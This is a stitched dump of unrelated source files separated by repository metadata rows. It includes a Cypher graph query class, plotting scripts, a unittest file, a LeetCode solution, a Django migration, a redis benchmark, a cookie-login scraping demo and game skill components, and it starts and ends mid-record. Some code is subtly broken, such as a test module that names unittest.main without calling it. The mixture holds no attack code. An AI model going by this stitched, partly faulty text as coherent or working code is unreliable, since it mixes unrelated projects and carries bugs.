log = logging.getLogger(__name__)
class GraphQuery(object):
    """Base class for paged graph queries: wraps the request-argument
    mapping (``data``) and a graph handle used by subclasses' execute()."""

    def __init__(self, graph, data):
        self.graph = graph
        self.data = data

    @property
    def limit(self):
        """Requested page size, capped at 5000; 15 on missing/bad input."""
        try:
            return min(int(self.data.get('limit', 15)), 5000)
        except (TypeError, ValueError):
            # fix: was a bare ``except:`` that also swallowed e.g.
            # KeyboardInterrupt; only conversion failures are expected here.
            return 15

    @property
    def offset(self):
        """Requested result offset, floored at 0; 0 on missing/bad input."""
        try:
            return max(int(self.data.get('offset', 0)), 0)
        except (TypeError, ValueError):
            return 0

    def ignore(self):
        """IDs the client asked to exclude from the results."""
        return self.data.getlist('ignore')

    def _bool(self, name, default=False):
        """Fetch a query argument, as a boolean."""
        # NOTE(review): ``unicode`` marks this as Python 2 source.
        v = unicode(self.data.get(name, '')).strip().lower()
        if not len(v):
            return default
        return v in ['true', '1', 'yes', 'y', 't']

    def _as_json(self, results):
        """Helper to make query responses more uniform."""
        return {
            'status': 'ok',
            'limit': self.limit,
            'offset': self.offset,
            'results': results
        }

    def to_dict(self):
        """Run the (subclass-provided) query and wrap it for JSON output."""
        return self._as_json(self.execute())
class NodeQuery(GraphQuery):
    """Paged node search, ACL-filtered by collection and ranked by degree
    (number of relationships)."""

    def text(self):
        """Optional name filter, compiled into a case-insensitive
        contains-regex for Cypher's ``=~``; None when absent or blank."""
        text = self.data.get('text')
        if text is not None:
            text = unicode(text).strip()
            if len(text) < 1:
                text = None
            else:
                text = '(?i).*%s.*' % text
        return text

    def collection_id(self):
        # Intersect the requested collections with those the user can read.
        collection_id = self.data.getlist('collection_id')
        return authz.collections_intersect(authz.READ, collection_id)

    def query(self):
        """Build the Cypher statement and its parameter map."""
        args = {
            'acl': authz.collections(authz.READ),
            'limit': self.limit,
            'offset': self.offset,
            'text': self.text(),
            'ignore': self.ignore(),
            'collection_id': self.collection_id()
        }
        filters = []
        # Both the node's and its neighbours' collections must be readable.
        filters.append('ncoll.alephCollection IN {collection_id}')
        filters.append('ocoll.alephCollection IN {acl}')
        if args['text'] is not None:
            filters.append('node.name =~ {text}')
        if len(args['ignore']):
            filters.append('NOT (node.id IN {ignore})')
        q = "MATCH (node)-[:PART_OF]->(ncoll:Collection) " \
            "MATCH (node)-[r]-(other) " \
            "MATCH (other)-[:PART_OF]->(ocoll:Collection) " \
            "WHERE %s " \
            "WITH node, count(r) AS degree " \
            "ORDER BY degree DESC " \
            "SKIP {offset} LIMIT {limit} " \
            "RETURN node, degree "
        q = q % ' AND '.join(filters)
        # print args, q
        return q, args

    def execute(self):
        """Run the query and return plain dicts, each with its '$degree'."""
        query, args = self.query()
        nodes = []
        for row in self.graph.run(query, **args):
            node = NodeType.dict(row.get('node'))
            node['$degree'] = row.get('degree')
            nodes.append(node)
        return nodes
class EdgeQuery(GraphQuery):
    """Paged edge search between ACL-filtered source and target nodes;
    source/target constraints fall back to the shared request parameters."""

    def source_collection_id(self):
        # Falls back to the generic 'collection_id' parameter when no
        # source-specific one is supplied.
        collection_id = self.data.getlist('source_collection_id')
        if not len(collection_id):
            collection_id = self.data.getlist('collection_id')
        return authz.collections_intersect(authz.READ, collection_id)

    def target_collection_id(self):
        collection_id = self.data.getlist('target_collection_id')
        if not len(collection_id):
            collection_id = self.data.getlist('collection_id')
        return authz.collections_intersect(authz.READ, collection_id)

    def source_id(self):
        # Falls back to the generic 'node_id' parameter.
        node_id = self.data.getlist('source_id')
        if not len(node_id):
            node_id = self.data.getlist('node_id')
        return node_id

    def target_id(self):
        node_id = self.data.getlist('target_id')
        if not len(node_id):
            node_id = self.data.getlist('node_id')
        return node_id

    def query(self):
        """Build the Cypher statement and its parameter map."""
        args = {
            'acl': authz.collections(authz.READ),
            'limit': self.limit,
            'offset': self.offset,
            'ignore': self.ignore(),
            'source_collection_id': self.source_collection_id(),
            'target_collection_id': self.target_collection_id(),
            'source_id': self.source_id(),
            'target_id': self.target_id()
        }
        # 'directed' switches the relationship match to one-way (-[]->).
        directed = '>' if self._bool('directed') else ''
        filters = []
        filters.append('sourcecoll.alephCollection IN {source_collection_id}')
        filters.append('targetcoll.alephCollection IN {target_collection_id}')
        if len(args['ignore']):
            filters.append('NOT (rel.id IN {ignore})')
        if len(args['source_id']):
            filters.append('source.id IN {source_id}')
        if len(args['target_id']):
            filters.append('target.id IN {target_id}')
        q = "MATCH (source)-[rel]-%s(target) " \
            "MATCH (source)-[:PART_OF]->(sourcecoll:Collection) " \
            "MATCH (target)-[:PART_OF]->(targetcoll:Collection) " \
            "WHERE %s " \
            "RETURN source.id AS source, rel, target.id AS target " \
            "SKIP {offset} LIMIT {limit} "
        filters = ' AND '.join(filters)
        q = q % (directed, filters)
        return q, args

    def execute(self):
        """Run the query and return edge dicts with '$source'/'$target' ids."""
        query, args = self.query()
        edges = []
        for row in self.graph.run(query, **args):
            data = EdgeType.dict(row.get('rel'))
            data['$source'] = row.get('source')
            data['$target'] = row.get('target')
            edges.append(data)
        return edges
|
[
"friedrich@pudo.org"
] |
friedrich@pudo.org
|
58acf6941d6f455e0defc79c0d205906fa6f200f
|
847986bccb499dca707f7ad8ea3b7406e5178c7a
|
/testing_effectiveness/show_structure_metrics.py
|
ed1b836e811d70b25b693d7ead8010ea042c3f2d
|
[] |
no_license
|
jianing-li/asynchronous-spatio-temporal-spike-metric
|
08818c00510d00c593f081aed078e9047d8d8b97
|
71b31956ba47e83e43138498aceb441f184282cd
|
refs/heads/master
| 2021-07-13T16:51:20.120434
| 2020-10-03T10:01:24
| 2020-10-03T10:43:57
| 203,725,140
| 16
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,157
|
py
|
"""
Function: Show searching error curves for spike metrics.
Author: Jianing Li, lijianing@pku.edu.cn, Peking University, Apr. 1st, 2019.
"""
import numpy as np
import pickle
from matplotlib import pyplot as pl
# fix: the pickle files below were opened without ever being closed;
# ``with`` blocks now release the handles deterministically.

# load noise ratio steps.
with open('../datasets/search_moving_target/noise_ratio_steps.pkl', 'rb') as f:
    noise_ratio_steps = pickle.load(f)

# load kernel cube errors (sorted ascending for a monotone curve).
with open('../datasets/search_moving_target/kernel_cube_errors.pkl', 'rb') as f:
    kernel_cube_errors = pickle.load(f)
kernel_cube_errors = kernel_cube_errors[np.argsort(kernel_cube_errors)]

# load kernel train errors.
with open('../datasets/search_moving_target/kernel_train_errors.pkl', 'rb') as f:
    kernel_train_errors = pickle.load(f)
kernel_train_errors = kernel_train_errors[np.argsort(kernel_train_errors)]/2 # show better curve

# load kernel train errors using polarity interference.
with open('../datasets/search_moving_target/kernel_train_pif_errors.pkl', 'rb') as f:
    kernel_train_pif_errors = pickle.load(f)
kernel_train_pif_errors = kernel_train_pif_errors[np.argsort(kernel_train_pif_errors)]/2 # show better curve

# show spike metrics for structure attribute.
fig = pl.figure()
pl.plot(noise_ratio_steps, kernel_train_errors, '--', color='blue', markersize=3, linewidth=3, figure=fig, label='KMST[17]')
pl.plot(noise_ratio_steps, kernel_train_pif_errors, '-.', color='limegreen' ,markersize=3, linewidth=3, figure=fig, label='KMST-P[23]')
pl.plot(noise_ratio_steps, kernel_cube_errors,'-', color='red', markersize=3, linewidth=3, figure=fig, label='ASTSM')

font1 = {'family': 'Times New Roman', 'size': 20}
font2 = {'size': 16}
pl.xlabel(r'$N_\tau$',font1)
pl.grid(axis='y', linestyle='-.')
pl.ylabel('Tracking errors / pixel', font1)
pl.xlim((0, 2))
pl.ylim((0, 60))
pl.xticks(np.linspace(0, 2, 5), fontsize=16)
pl.yticks(fontsize=16)
pl.yticks(np.linspace(0, 60, 5), fontsize=16)
#pl.legend(loc = 0, prop=font2)
pl.legend(loc='upper center', bbox_to_anchor=(0.24, 0.98), prop=font2)
pl.show()
|
[
"you@example.com"
] |
you@example.com
|
c2795bb8eb76134679bae4e2d4db6248d789a084
|
7ec38beb6f041319916390ee92876678412b30f7
|
/src/hands_on_python/Ch11/test_survey.py
|
d791bfdea04977060bae33655c2b31987ac63c44
|
[] |
no_license
|
hopensic/LearnPython
|
3570e212a1931d4dad65b64ecdd24414daf51c73
|
f735b5d865789843f06a623a4006f8883d6d1ae0
|
refs/heads/master
| 2022-02-18T23:11:30.663902
| 2022-02-12T17:51:56
| 2022-02-12T17:51:56
| 218,924,551
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 773
|
py
|
import unittest
from hands_on_python.Ch11.survey import AnonymousSurvey
class TestAnonymousSurvey(unittest.TestCase):
    """Unit tests for AnonymousSurvey's response storage."""

    def test_store_single_response(self):
        # A single stored answer must appear in the survey's responses.
        question = "What language did you first learn to speak?"
        my_survey = AnonymousSurvey(question)
        my_survey.store_response('English')
        self.assertIn('English', my_survey.responses)

    def test_store_three_responses(self):
        # Several answers stored in sequence are all retained.
        question = "What language did you first learn to speak?"
        my_survey = AnonymousSurvey(question)
        responses = ['English', 'Spanish', 'Mandarin']
        for response in responses:
            my_survey.store_response(response)
        for response in responses:
            self.assertIn(response, my_survey.responses)
unittest.main
|
[
"hopensic@gmail.com"
] |
hopensic@gmail.com
|
7d0e800f405196bc4560f3977f641aaec29c8f6c
|
f038216be109882668ccd89b71efe0127d845bfb
|
/LeetCode/maximum_product_subarray.py
|
549754da4a93cc85ee54958809337371159a4be4
|
[] |
no_license
|
kunalt4/ProblemSolvingDSandAlgo
|
84b29a7eb2f73ea3b0450ed4b0707bc2d031c00d
|
6a796dd1a778049418d47bc3b94b82c7a2680d26
|
refs/heads/master
| 2021-08-16T23:05:39.452968
| 2020-09-16T00:02:06
| 2020-09-16T00:02:06
| 221,677,287
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 598
|
py
|
class Solution:
    def maxProduct(self, nums: List[int]) -> int:
        """Largest product over all contiguous subarrays of *nums*.

        Tracks both the running maximum and minimum product ending at the
        current element -- a negative value can flip the two extremes.
        """
        best = cur_max = cur_min = nums[0]
        for value in nums[1:]:
            candidates = (value, cur_max * value, cur_min * value)
            cur_max = max(candidates)
            cur_min = min(candidates)
            best = max(best, cur_max)
        return best
|
[
"noreply@github.com"
] |
kunalt4.noreply@github.com
|
1fee6a27ba3515c6d93b1874124ed5f7b7d389f4
|
e8cb2241329e57c9a4a5a23f839a352c98c791bc
|
/brainstorm/structure/buffer_views.py
|
dfc17d220d5a800d618b558d39cf7a1e64c4e068
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
xiaoerlaigeid/brainstorm
|
cc21cd75a05891d5fd1cff50d5c0e55d31f64d5b
|
8f1fc886faf268b25085fa5c95bf106b1805d766
|
refs/heads/master
| 2021-06-14T16:50:11.653075
| 2017-03-16T08:19:44
| 2017-03-16T08:19:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,752
|
py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, print_function, unicode_literals
from brainstorm.utils import get_by_path
class BufferView(list):
    """A list of buffers that also supports name-based access.

    Each buffer is reachable positionally (``view[0]``), as an attribute
    (``view.name``), by key (``view['name']``), and by dotted path
    (``view['a.b']``, resolved through get_by_path).
    """

    def __init__(self, buffer_names, buffers, full_buffer=None):
        super(BufferView, self).__init__(buffers)
        if not len(buffers) == len(buffer_names):
            raise ValueError("Length mismatch between buffers and names ({} !="
                             " {})".format(len(buffers), len(buffer_names)))
        self._full_buffer = full_buffer
        self._buffer_names = tuple(buffer_names)
        self._keys = set(buffer_names)
        # Expose each buffer as an attribute named after it.
        for i, n in enumerate(buffer_names):
            self.__dict__[n] = self[i]

    def adjust(self, buffer_names, buffers, full_buffer=None):
        """Re-point this view at new buffers in place; the name tuple must
        match the one given at construction. Returns self."""
        assert self._buffer_names == tuple(buffer_names)
        self._full_buffer = full_buffer
        for i, (n, b) in enumerate(zip(buffer_names, buffers)):
            self[i] = b
            self.__dict__[n] = self[i]
        return self

    def _asdict(self):
        # Name -> buffer mapping in construction order.
        return dict(zip(self._buffer_names, self))

    def items(self):
        return self._asdict().items()

    def keys(self):
        return self._asdict().keys()

    def values(self):
        return self._asdict().values()

    def __getitem__(self, item):
        # Integers keep normal list indexing; strings resolve by name or,
        # when dotted, recursively through nested views.
        if isinstance(item, int):
            return super(BufferView, self).__getitem__(item)
        if item in self._keys:
            return self.__dict__[item]
        elif '.' in item:
            return get_by_path(self, item)
        raise KeyError('{} is not present. Available items are [{}]'
                       .format(item, ", ".join(sorted(self._keys))))

    def __contains__(self, item):
        # Membership is by buffer *name*, not by buffer value.
        return item in self._buffer_names
|
[
"qwlouse@gmail.com"
] |
qwlouse@gmail.com
|
97299d77812c63fa7f1e4f9466025b8724f95166
|
33b7a63d0866f9aabfdfdc342236191bebd1c1e6
|
/django_learning/chapter09/xss/xss_demo/front/migrations/0001_initial.py
|
d390906c9e092b0c32fa2850951a7f2870b4ceff
|
[] |
no_license
|
leolvcl/leo_python
|
21f61bb898f8c755d1ff405f90864887e18a317e
|
5be0d897eeee34d50d835707112fb610de69b4c8
|
refs/heads/master
| 2020-08-02T21:00:01.808704
| 2019-12-06T17:04:59
| 2019-12-06T17:04:59
| 211,505,290
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
# Generated by Django 2.0.2 on 2018-05-16 02:54
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration: creates the ``Comment`` table with
    # an auto-increment primary key and a free-text ``content`` column.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.TextField()),
            ],
        ),
    ]
|
[
"lvclleo@gmail.com"
] |
lvclleo@gmail.com
|
6855119c71a47bc978c06db2bab99f04d55fa0bb
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/oLmAshdKHWLP3ck7e_24.py
|
bd6dca045b9dcd263e67ceb1e39236707e84e75a
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
def min_difference_pair(nums):
    """Return the pair (sorted ascending) with the smallest absolute
    difference; ties are broken by the smaller pair sum.

    Fix: the original seeded ``best`` with ``abs(nums[0])``, which can be
    smaller than every pair difference (e.g. nums starting at 0), making
    the function return [] even for valid input. ``best`` now comes from
    the first pair examined.
    """
    best = None
    r = []
    for i in range(len(nums)):
        for j in range(i + 1, len(nums)):
            now = abs(nums[i] - nums[j])
            if best is None or now < best:
                best = now
                r = sorted([nums[i], nums[j]])
            elif now == best and sum(r) > nums[i] + nums[j]:
                # Equal difference: prefer the pair with the smaller sum.
                r = sorted([nums[i], nums[j]])
    return r
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
ee749b64ebe34821da17751d091a13b06dbf8a81
|
27ad9461526e9a87b66a01306b48470d7dea9800
|
/src/SpringLeaf_subset.py
|
3d4f305d0d9c9c463cf36a0f575427baeadbb087
|
[] |
no_license
|
aocampor/SpringLeafKaggle
|
100aeab631af76ed535dd700bfb1294c161e0880
|
02d89f31cbc6a615db9b035efe4a8083f7f9188c
|
refs/heads/master
| 2016-08-04T10:17:56.011049
| 2015-09-22T16:34:19
| 2015-09-22T16:34:19
| 42,946,548
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 233
|
py
|
import os, sys
if __name__ == "__main__":
file1 = open("Data/train.csv", "r")
i = 0
for line in file1:
lintok = line.rsplit(',')
print line
i = i + 1
if( i == 10000):
break
|
[
"alocampor@gmail.com"
] |
alocampor@gmail.com
|
c4795d1ec0e1b486ef8807813294a6243626829d
|
0739ea9aef038d50d2d8adfae53938795f921417
|
/examples/benchmarks/hiredis_test.py
|
cf16da355872a6011295538c60b14d8ab9aa3804
|
[
"BSD-2-Clause-Views"
] |
permissive
|
vtheno/asyncio-redis
|
b51bf2c5ba265c56134532797ed2d683ffaf1209
|
a57a528d1bdf14be12953f8bf96df2f3ed24b840
|
refs/heads/master
| 2020-09-23T19:24:10.243603
| 2019-12-03T08:28:54
| 2019-12-03T08:28:54
| 225,567,864
| 0
| 0
|
NOASSERTION
| 2019-12-03T08:25:49
| 2019-12-03T08:25:48
| null |
UTF-8
|
Python
| false
| false
| 3,185
|
py
|
#!/usr/bin/env python
"""
Compare how fast HiRedisProtocol is compared to the pure Python implementation
for a few different benchmarks.
"""
import asyncio
import asyncio_redis
import time
try:
import hiredis
except ImportError:
hiredis = None
from asyncio_redis.protocol import HiRedisProtocol
@asyncio.coroutine
def test1(connection):
""" Del/get/set of keys """
yield from connection.delete(['key'])
yield from connection.set('key', 'value')
result = yield from connection.get('key')
assert result == 'value'
@asyncio.coroutine
def test2(connection):
""" Get/set of a hash of 100 items (with _asdict) """
d = { str(i):str(i) for i in range(100) }
yield from connection.delete(['key'])
yield from connection.hmset('key', d)
result = yield from connection.hgetall_asdict('key')
assert result == d
@asyncio.coroutine
def test3(connection):
""" Get/set of a hash of 100 items (without _asdict) """
d = { str(i):str(i) for i in range(100) }
yield from connection.delete(['key'])
yield from connection.hmset('key', d)
result = yield from connection.hgetall('key')
d2 = {}
for f in result:
k,v = yield from f
d2[k] = v
assert d2 == d
@asyncio.coroutine
def test4(connection):
""" sadd/smembers of a set of 100 items. (with _asset) """
s = { str(i) for i in range(100) }
yield from connection.delete(['key'])
yield from connection.sadd('key', list(s))
s2 = yield from connection.smembers_asset('key')
assert s2 == s
@asyncio.coroutine
def test5(connection):
""" sadd/smembers of a set of 100 items. (without _asset) """
s = { str(i) for i in range(100) }
yield from connection.delete(['key'])
yield from connection.sadd('key', list(s))
result = yield from connection.smembers('key')
s2 = set()
for f in result:
i = yield from f
s2.add(i)
assert s2 == s
benchmarks = [
(1000, test1),
(100, test2),
(100, test3),
(100, test4),
(100, test5),
]
def run():
connection = yield from asyncio_redis.Connection.create(host='localhost', port=6379)
if hiredis:
hiredis_connection = yield from asyncio_redis.Connection.create(host='localhost', port=6379, protocol_class=HiRedisProtocol)
try:
for count, f in benchmarks:
print('%ix %s' % (count, f.__doc__))
# Benchmark without hredis
start = time.time()
for i in range(count):
yield from f(connection)
print(' Pure Python: ', time.time() - start)
# Benchmark with hredis
if hiredis:
start = time.time()
for i in range(count):
yield from f(hiredis_connection)
print(' hiredis: ', time.time() - start)
print()
else:
print(' hiredis: (not available)')
finally:
connection.close()
if hiredis:
hiredis_connection.close()
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(run())
|
[
"jonathan@slenders.be"
] |
jonathan@slenders.be
|
7b77ab771feda6d519910a539c1f19e5644f000a
|
b864b992187e2e1c5c8da6fdabeeab5040058fe9
|
/Python Example/python-scraping-master/chapter9/3-cookies.py
|
6e66f04ccd21321913b9a0e62aa1a20b8e046a88
|
[] |
no_license
|
Mr-Phoebe/ProgramLanguage
|
5384afeef20c8a12cd89cf3720beb0337bd38fc9
|
1588aea62e15304339efb73d55653be1b4e57156
|
refs/heads/master
| 2023-02-06T11:59:06.272680
| 2023-02-06T04:00:14
| 2023-02-06T04:00:14
| 65,252,634
| 52
| 37
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 366
|
py
|
import requests
params = {'username': 'Ryan', 'password': 'password'}
r = requests.post("http://pythonscraping.com/pages/cookies/welcome.php", params)
print("Cookie is set to:")
print(r.cookies.get_dict())
print("-----------")
print("Going to profile page...")
r = requests.get("http://pythonscraping.com/pages/cookies/profile.php", cookies=r.cookies)
print(r.text)
|
[
"whn289467822@outlook.com"
] |
whn289467822@outlook.com
|
d2a3dc5f7164f1b606f5b0a11bad3d656716af12
|
425b5719ecf6b40bf3de94ddf6e0cc9cf72717b7
|
/app/engine/skill_components/charge_components.py
|
e879b21be2baee20d970ef87e0c7dbc70eb2cfec
|
[
"MIT"
] |
permissive
|
zerorock1312/lt-maker-master
|
3b9b2e7245215936018601432a98915c40f3937d
|
82f733683f9dba763a5de8567c41fd7cbcfb0173
|
refs/heads/main
| 2023-06-04T10:28:43.931841
| 2021-06-18T06:03:40
| 2021-06-18T06:03:40
| 378,050,560
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,472
|
py
|
from app.data.skill_components import SkillComponent
from app.data.components import Type
from app.engine import action
class BuildCharge(SkillComponent):
nid = 'build_charge'
desc = "Skill gains charges until full"
tag = "charge"
expose = Type.Int
value = 10
ignore_conditional = True
def init(self, skill):
self.skill.data['charge'] = 0
self.skill.data['total_charge'] = self.value
def condition(self, unit):
return self.skill.data['charge'] >= self.skill.data['total_charge']
def on_end_chapter(self, unit, skill):
self.skill.data['charge'] = 0
def trigger_charge(self, unit, skill):
action.do(action.SetObjData(self.skill, 'charge', 0))
def text(self) -> str:
return str(self.skill.data['charge'])
def cooldown(self):
return self.skill.data['charge'] / self.skill.data['total_charge']
class DrainCharge(SkillComponent):
nid = 'drain_charge'
desc = "Skill will have a number of charges that are drained by 1 when activated"
tag = "charge"
expose = Type.Int
value = 1
ignore_conditional = True
def init(self, skill):
self.skill.data['charge'] = self.value
self.skill.data['total_charge'] = self.value
def condition(self, unit):
return self.skill.data['charge'] > 0
def on_end_chapter(self, unit, skill):
self.skill.data['charge'] = self.skill.data['total_charge']
def trigger_charge(self, unit, skill):
new_value = self.skill.data['charge'] - 1
action.do(action.SetObjData(self.skill, 'charge', new_value))
def text(self) -> str:
return str(self.skill.data['charge'])
def cooldown(self):
return self.skill.data['charge'] / self.skill.data['total_charge']
def get_marks(playback, unit, item):
from app.data.database import DB
marks = [mark for mark in playback if mark[0] == 'mark_hit']
marks += [mark for mark in playback if mark[0] == 'mark_crit']
if DB.constants.value('miss_wexp'):
marks += [mark for mark in playback if mark[0] == 'mark_miss']
marks = [mark for mark in marks if mark[1] == unit and mark[2] != unit and mark[4] == item]
return marks
class CombatChargeIncrease(SkillComponent):
nid = 'combat_charge_increase'
desc = "Increases charge of skill each combat"
tag = "charge"
expose = Type.Int
value = 5
ignore_conditional = True
def end_combat(self, playback, unit, item, target, mode):
marks = get_marks(playback, unit, item)
if not self.skill.data.get('active') and marks:
new_value = self.skill.data['charge'] + self.value
new_value = min(new_value, self.skill.data['total_charge'])
action.do(action.SetObjData(self.skill, 'charge', new_value))
class CombatChargeIncreaseByStat(SkillComponent):
nid = 'combat_charge_increase_by_stat'
desc = "Increases charge of skill each combat"
tag = "charge"
expose = Type.Stat
value = 'SKL'
ignore_conditional = True
def end_combat(self, playback, unit, item, target, mode):
marks = get_marks(playback, unit, item)
if not self.skill.data.get('active') and marks:
new_value = self.skill.data['charge'] + unit.stats[self.value] + unit.stat_bonus(self.value)
new_value = min(new_value, self.skill.data['total_charge'])
action.do(action.SetObjData(self.skill, 'charge', new_value))
|
[
"85828552+zerorock1312@users.noreply.github.com"
] |
85828552+zerorock1312@users.noreply.github.com
|
6456530f6f5fe8c9d04436f610dd784a925f2956
|
ab197194e6f4a7dae78b4cf72456aff78e71740f
|
/compareResolutionFuncP.py
|
f2da1495ae04835fded68c0180f4b7e631977539
|
[] |
no_license
|
JanFSchulte/MuonResolution
|
b75919e4dabb064476bc71c997a42b916dd039e0
|
e39b4055b654f2b2e93b3b0fdac826fa630b042f
|
refs/heads/master
| 2023-07-02T12:02:40.541267
| 2023-06-06T16:14:45
| 2023-06-06T16:14:45
| 164,695,533
| 0
| 2
| null | 2019-09-13T09:47:52
| 2019-01-08T17:01:51
|
Python
|
UTF-8
|
Python
| false
| false
| 4,847
|
py
|
from ROOT import *
import pickle
import math
from setTDRStyle import setTDRStyle
def efficiencyRatio(eff1,eff2):
newEff = TGraphAsymmErrors(eff1.GetN())
for i in range(0,eff1.GetN()):
pointX1 = Double(0.)
pointX2 = Double(0.)
pointY1 = Double(0.)
pointY2 = Double(0.)
isSuccesful1 = eff1.GetPoint(i,pointX1,pointY1)
isSuccesful2 = eff2.GetPoint(i,pointX2,pointY2)
errY1Up = eff1.GetErrorYhigh(i)
errY1Low = eff1.GetErrorYlow(i)
errY2Up = eff2.GetErrorYhigh(i)
errY2Low = eff2.GetErrorYlow(i)
errX = eff1.GetErrorX(i)
if pointY2!=0:
yValue = pointY1/pointY2
xValue = pointX1
xError = errX
#~ yErrorUp = math.sqrt(((1/pointY2)*errY1Up)**2+((pointY1/pointY2**2)*errY2Up)**2)
yErrorUp = math.sqrt(((1/pointY2)*errY1Up)**2+((pointY1/pointY2**2)*errY2Up)**2)
yErrorDown = math.sqrt(((1/pointY2)*errY1Low)**2+((pointY1/pointY2**2)*errY2Low)**2)
else:
yValue = 0
xValue = pointX1
xError = errX
yErrorUp =0
yErrorDown = 0
#~ print i
newEff.SetPoint(i,xValue,yValue)
newEff.SetPointError(i,xError,xError,yErrorDown,yErrorUp)
return newEff
def getRatio(result,result2,label):
masses = result["mass"]
massErr = result["massErr"]
sigma = result["sigma"]
sigmaErr = result["sigmaErr"]
masses2 = result2["mass"]
massErr2 = result2["massErr"]
sigma2 = result2["sigma"]
sigmaErr2 = result2["sigmaErr"]
ratio = TGraphErrors(len(masses))
ratio.SetName(label)
for i,mass in enumerate(masses):
ratio .SetPoint(i,mass,sigma[i]/sigma2[i])
ratio .SetPointError(i,massErr[i],(sigma[i]/sigma2[i])*math.sqrt((sigmaErr[i]/sigma[i])**2+(sigmaErr2[i]/sigma2[i])**2))
return ratio
def getGraph(result,label):
masses = result["mass"]
massErr = result["massErr"]
sigma = result["sigma"]
sigmaErr = result["sigmaErr"]
res = TGraphAsymmErrors(len(masses))
res.SetName(label)
for i,mass in enumerate(masses):
res.SetPoint(i,mass,sigma[i])
res.SetPointError(i,massErr[i],massErr[i],sigmaErr[i],sigmaErr[i])
return res
def compareMassRes(trackType):
cat = ["B","O","E"]
for c in cat:
file2016BB = open("defaultPSplit/PResolutionVsP_%s_%s.pkl"%(trackType,c))
file2017BB = open("cruijffPSplit/PResolutionVsP_%s_%s.pkl"%(trackType,c))
fileCBB = open("crystalPSplit/PResolutionVsP_%s_%s.pkl"%(trackType,c))
results2016BB = pickle.load(file2016BB)
results2017BB = pickle.load(file2017BB)
resultsCBB = pickle.load(fileCBB)
graph2016BB = getGraph(results2016BB,"DCBBB")
graph2017BB = getGraph(results2017BB,"CruijffBB")
graphCBB = getGraph(resultsCBB,"CBB")
ratioBB = getRatio(results2016BB,results2017BB,"ratioBB")
ratioCBB = getRatio(results2016BB,resultsCBB,"ratioCBB")
canv = TCanvas("c1","c1",800,1200)
plotPad = TPad("plotPad","plotPad",0,0.3,1,1)
ratioPad = TPad("ratioPad","ratioPad",0,0.,1,0.3)
style = setTDRStyle()
gStyle.SetOptStat(0)
plotPad.UseCurrentStyle()
ratioPad.UseCurrentStyle()
plotPad.Draw()
ratioPad.Draw()
plotPad.cd()
plotPad.cd()
plotPad.SetGrid()
gStyle.SetTitleXOffset(1.45)
gStyle.SetTitleYOffset(1.55)
xMax = 0.15
if trackType == "Inner":
xMax = 0.3
if trackType == "Outer":
xMax = 0.5
plotPad.DrawFrame(0,0,3100,xMax,";p^{#mu} [GeV]; p^{#mu} resolution")
graph2016BB.Draw("samepe")
graph2017BB.Draw("samepe")
graphCBB.Draw("samepe")
graph2017BB.SetLineColor(kRed)
graph2017BB.SetMarkerColor(kRed)
graphCBB.SetLineColor(kBlue)
graphCBB.SetMarkerColor(kBlue)
latex = TLatex()
latex.SetTextFont(42)
latex.SetTextAlign(31)
latex.SetTextSize(0.04)
latex.SetNDC(True)
latexCMS = TLatex()
latexCMS.SetTextFont(61)
latexCMS.SetTextSize(0.055)
latexCMS.SetNDC(True)
latexCMSExtra = TLatex()
latexCMSExtra.SetTextFont(52)
latexCMSExtra.SetTextSize(0.03)
latexCMSExtra.SetNDC(True)
latex.DrawLatex(0.95, 0.96, "(13 TeV)")
cmsExtra = "#splitline{Preliminary}{}"
latexCMS.DrawLatex(0.19,0.88,"CMS")
if "Simulation" in cmsExtra:
yLabelPos = 0.81
else:
yLabelPos = 0.84
latexCMSExtra.DrawLatex(0.19,yLabelPos,"%s"%(cmsExtra))
leg = TLegend(0.52, 0.76, 0.95, 0.91,"%s %s"%(trackType,c),"brNDC")
leg.SetFillColor(10)
leg.SetFillStyle(0)
leg.SetLineColor(10)
leg.SetShadowColor(0)
leg.SetBorderSize(1)
leg.AddEntry(graph2016BB,"Cruijff","l")
leg.AddEntry(graph2017BB,"Double CB","l")
leg.AddEntry(graphCBB,"Crystal Ball","l")
leg.Draw()
plotPad.RedrawAxis()
ratioPad.cd()
ratioBB.SetLineColor(kRed)
ratioCBB.SetLineColor(kBlue)
ratioPad.DrawFrame(0,0.5,3100,1.5,";ratio")
ratioBB.Draw("samepe")
ratioCBB.Draw("samepe")
canv.Print("pResolutionCompareFunc_%s_%s.pdf"%(trackType,c))
tracks = ["Inner","Outer","Global","TPFMS","Picky","DYT","TunePNew"]
for trackType in tracks:
compareMassRes(trackType)
|
[
"jschulte@cern.ch"
] |
jschulte@cern.ch
|
29793a85a88c5177d18332fa38bda80e0a5ece4c
|
e53cd62a6b0fa27f8f712b7df92897d61b532807
|
/Lesson_1/1.8 If's.py
|
7ef3dc5aa292ee0c6d1eccaeaa3385c9462d279c
|
[] |
no_license
|
AdamSierzan/Python_basics_course_2
|
dc465ed0223347d5f555b835ac89c456fab5699c
|
216ccf66d8a1bccf376564297e60fcfb8cf0696b
|
refs/heads/master
| 2021-05-18T19:51:35.721711
| 2020-04-03T19:58:23
